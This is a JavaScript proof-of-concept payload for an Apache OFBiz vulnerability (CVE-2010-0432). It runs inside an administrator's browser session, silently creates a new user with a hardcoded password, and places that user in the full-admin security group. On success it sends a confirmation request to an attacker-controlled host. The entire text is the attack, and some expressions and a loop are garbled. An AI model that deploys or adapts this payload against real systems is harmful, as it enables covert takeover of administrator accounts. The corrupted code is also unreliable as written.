/* Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa ( lucas -at- bonsai-sec.com ). Bonsai Information Security http://www.bonsai-sec.com/ */ var username = 'bonsaiUser'; var password = 'bonsaiPass'; var nodes = document.getElementsByClassName('fieldWidth300'); for (var i=0; i).toString(); var str2 = ().toString(); var str3 = ().toString(); var post_data = str1 + password + str2 + password + str3 + username; xmlhttp2.send(post_data); var xmlhttp3=false; try { xmlhttp3 = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp3 = new ActiveXObject("Microsoft.XMLHTTP"); } catch (E) { xmlhttp3 = false; } } if (!xmlhttp3 && typeof XMLHttpRequest!='undefined') { try { xmlhttp3 = new XMLHttpRequest(); } catch (e) { xmlhttp3=false; } } if (!xmlhttp3 && window.createRequest) { try { xmlhttp3 = window.createRequest(); } catch (e) { xmlhttp3=false; } } xmlhttp3.open("POST", "/webtools/control/UpdateGeneric?entityName=UserLoginSecurityGroup&externalLoginKey="+externalKey,true); xmlhttp3.onreadystatechange=function() { if (xmlhttp3.readyState==4) { if(/UserLoginSecurityGroup/.test(xmlhttp3.responseText)){ var xmlhttp4=false; try { xmlhttp4 = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp4 = new ActiveXObject("Microsoft.XMLHTTP"); } catch (E) { xmlhttp4 = false; } } if (!xmlhttp4 && typeof XMLHttpRequest!='undefined') { try { xmlhttp4 = new XMLHttpRequest(); } catch (e) { xmlhttp4=false; } } if (!xmlhttp4 && window.createRequest) { try { xmlhttp4 = window.createRequest(); } catch (e) { xmlhttp4=false; } } xmlhttp4.open("GET", " http://www.attacker.com/successful-ofbiz-attack.php?done=yes",true); xmlhttp4.send(null); } } } xmlhttp3.setRequestHeader("cookie",cookie); xmlhttp3.setRequestHeader("content-type", "application/x-www-form-urlencoded"); var str1 = ().toString(); var str2 = ().toString(); var post_data2 = str1 + username + str2; xmlhttp3.send(post_data2); } }